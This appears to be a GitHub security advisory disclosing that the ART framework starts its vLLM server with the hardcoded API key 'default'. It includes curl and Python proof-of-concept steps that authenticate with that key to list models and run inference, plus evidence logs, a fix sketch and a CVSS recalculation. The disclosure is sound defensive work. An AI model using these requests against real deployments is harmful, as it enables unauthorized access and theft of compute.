[Security] Hardcoded API Key in vLLM Server Configuration Allows Authentication Bypass

### Advisory Details
**Title**: Hardcoded API Key in vLLM Server Configuration Allows Authentication Bypass

**Description**:

### Summary
A hardcoded-credential vulnerability exists in the ART framework's vLLM server configuration generator. The framework unconditionally starts the built-in vLLM OpenAI-compatible server with its API key set to `"default"`. Anyone with network access to the service who knows this value can pass authentication without legitimate credentials, consume LLM inference resources, and query sensitive model deployment information.

### Details
In `src/art/dev/openai_server.py`, the `get_openai_server_config` function is responsible for orchestrating the setup of the internal vLLM server. The `ServerArgs` data structure is instantiated with a hardcoded `api_key="default"`. 

The key is assigned statically and passed to the vLLM engine at startup. No random token is generated, and the user is not required to supply a key. As a result, the vLLM server's authentication middleware accepts `Authorization: Bearer default` on every incoming REST API request.
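One possible alternative to a static key is sketched below. It is a minimal illustration, not ART's code: the helper `resolve_api_key`, the environment variable `ART_SERVER_API_KEY`, and the `WEAK_KEYS` set are hypothetical names introduced here. The idea is to prefer an operator-supplied key, refuse known placeholder values, and otherwise generate a fresh random token on each launch using Python's standard `secrets` module.

```python
import os
import secrets
from typing import Optional

# Hypothetical names for illustration only; ART does not define these.
ENV_VAR = "ART_SERVER_API_KEY"
WEAK_KEYS = {"", "default", "changeme", "test"}


def resolve_api_key(explicit_key: Optional[str] = None) -> str:
    """Return an operator-supplied key, or a fresh random token if none is set."""
    key = explicit_key if explicit_key is not None else os.environ.get(ENV_VAR)
    if key is None:
        # 32 random bytes, URL-safe base64 encoded (about 43 characters).
        return secrets.token_urlsafe(32)
    if key.strip().lower() in WEAK_KEYS:
        raise ValueError("refusing to start with a placeholder API key")
    return key
```

With a helper like this, the value passed as `api_key` would differ on every launch unless the operator sets one explicitly, so `Bearer default` would no longer be a valid credential.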

### PoC
1. Deploy the ART framework and start a local model service (e.g., via the LocalBackend or CLI), which exposes the vLLM HTTP API on a listening port (e.g., `8000`).

2. **Step 1 — Confirm auth bypass** (list models with hardcoded key):
```bash
curl -s http://<target>:8000/v1/models \
     -H "Authorization: Bearer default" | python3 -m json.tool
```

3. **Step 2 — Demonstrate actual harm** (unauthorized inference / GPU resource theft):
```bash
curl -s http://<target>:8000/v1/chat/completions \
     -H "Authorization: Bearer default" \
     -H "Content-Type: application/json" \
     -d '{
       "model": "Qwen/Qwen1.5-0.5B",
       "messages": [{"role": "user", "content": "What is the capital of France?"}],
       "max_tokens": 64
     }' | python3 -m json.tool
```

4. **Step 3 — Negative test** (wrong key is correctly rejected, proving auth middleware is active):
```bash
curl -i http://<target>:8000/v1/models \
     -H "Authorization: Bearer wrong-key"
```
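The three `curl` steps above can also be scripted. The following is a rough sketch using only the Python standard library; the function names `build_request`, `status_of`, and `run_poc` are illustrative and not part of ART or vLLM. The endpoints, the `Bearer default` header, and the request body are taken from the steps above.

```python
import json
import urllib.error
import urllib.request
from typing import Optional


def build_request(base_url: str, path: str, api_key: str,
                  payload: Optional[dict] = None) -> urllib.request.Request:
    """Build a GET (no payload) or JSON POST request carrying a Bearer token."""
    headers = {"Authorization": f"Bearer {api_key}"}
    data = None
    if payload is not None:
        headers["Content-Type"] = "application/json"
        data = json.dumps(payload).encode("utf-8")
    return urllib.request.Request(base_url.rstrip("/") + path,
                                  data=data, headers=headers)


def status_of(request: urllib.request.Request, timeout: float = 10.0) -> int:
    """Send the request and return the HTTP status code, including 4xx/5xx."""
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.status
    except urllib.error.HTTPError as err:
        return err.code


def run_poc(base_url: str, model: str) -> dict:
    """Run the three PoC steps and return the observed status codes."""
    chat = {
        "model": model,
        "messages": [{"role": "user", "content": "What is the capital of France?"}],
        "max_tokens": 64,
    }
    return {
        "list_models_default_key": status_of(
            build_request(base_url, "/v1/models", "default")),
        "chat_default_key": status_of(
            build_request(base_url, "/v1/chat/completions", "default", chat)),
        "list_models_wrong_key": status_of(
            build_request(base_url, "/v1/models", "wrong-key")),
    }
```

Calling `run_poc("http://<target>:8000", "Qwen/Qwen1.5-0.5B")` against a deployment you are authorized to test returns the three status codes for comparison with the evidence log.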

### Log of Evidence
**Step 1 — Auth bypass succeeds (model listing):**
```text
{
    "object": "list",
    "data": [
        {
            "id": "Qwen/Qwen1.5-0.5B",
            "object": "model",
            "created": 1774020077,
            "owned_by": "organization",
            "permission": []
        }
    ]
}
```

**Step 2 — Unauthorized inference succeeds (GPU resource theft):**
```text
{
    "id": "chatcmpl-583d9a951ae8",
    "object": "chat.completion",
    "created": 1774020077,
    "model": "Qwen/Qwen1.5-0.5B",
    "choices": [
        {
            "index": 0,
            "message": {
                "role": "assistant",
                "content": "The capital of France is Paris..."
            },
            "finish_reason": "stop"
        }
    ],
    "usage": {
        "prompt_tokens": 30,
        "completion_tokens": 36,
        "total_tokens": 66
    }
}
```
The model processed the attacker's prompt and returned a valid inference result, proving the attacker can **consume GPU compute resources at will** without any legitimate credentials.

**Step 3 — Wrong key is rejected (auth middleware is active):**
```text
HTTP/1.1 401 Unauthorized
content-type: application/json

{"error":{"message":"Unauthorized","type":"invalid_api_key"}}
```
This confirms the authentication mechanism is present and functioning — the vulnerability is specifically that the API key is hardcoded to a predictable value (`"default"`), not that authentication is missing.
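
The reasoning behind the negative test can be written as a small decision function. This is only an illustrative sketch; the function name `classify` and the returned labels are made up here. It takes the status code observed with the `default` key and the one observed with a wrong key, and distinguishes a hardcoded key from missing authentication.

```python
def classify(status_default_key: int, status_wrong_key: int) -> str:
    """Interpret the two probe results from the PoC."""
    ok_default = 200 <= status_default_key < 300
    ok_wrong = 200 <= status_wrong_key < 300
    if ok_default and not ok_wrong:
        # Auth is enforced, but the predictable key is a valid credential.
        return "hardcoded-key-accepted"
    if ok_default and ok_wrong:
        # Any token works, so authentication is effectively off.
        return "auth-disabled"
    # The default key did not work; this deployment uses a different key.
    return "default-key-rejected"
```

For the evidence above (200 with `default`, 401 with `wrong-key`), the function returns `"hardcoded-key-accepted"`.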

### Impact
This is an Improper Authentication / Use of Hard-coded Credentials vulnerability. Any attacker who can route traffic to the listening port can pass the API authentication layer with the known key and make arbitrary LLM inference requests. The consequences include resource exhaustion, depletion of paid compute quota, Denial of Service (DoS) through saturated GPU capacity, and unauthorized reconnaissance of hosted models.

### Affected products
- **Ecosystem**: python
- **Package name**: art
- **Affected versions**: <= latest
- **Patched versions**: None

### Severity
- **Severity**: High
- **Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
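
As a cross-check of the rating, the base score for the vector string can be recomputed. The sketch below follows the CVSS v3.1 base-score formulas for the Scope: Unchanged case only; the function names are illustrative, and the weights are the published v3.1 metric values.

```python
import math

# Metric weights from the CVSS v3.1 specification (Scope: Unchanged only).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the CVSS v3.1 base score for a Scope: Unchanged vector."""
    parts = dict(item.split(":") for item in vector.split("/"))
    if parts.get("CVSS") != "3.1" or parts.get("S") != "U":
        raise ValueError("this sketch handles only CVSS:3.1 vectors with S:U")
    w = {name: WEIGHTS[name][parts[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"))  # 8.6
```

A score of 8.6 falls in the 7.0 to 8.9 band, which corresponds to the High rating stated above.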

### Weaknesses
- **CWE**: CWE-798: Use of Hard-coded Credentials

### Occurrences
| Permalink | Description |
| :--- | :--- |
| [https://github.com/OpenPipe/ART/blob/main/src/art/dev/openai_server.py#L30](https://github.com/OpenPipe/ART/blob/main/src/art/dev/openai_server.py#L30) | The `ServerArgs` initialization unconditionally sets `api_key="default"`, so the deployed vLLM instance accepts this well-known key for all authenticated API requests. |


[Security] Hardcoded API Key in vLLM Server Configuration Allows Authentication Bypass #628
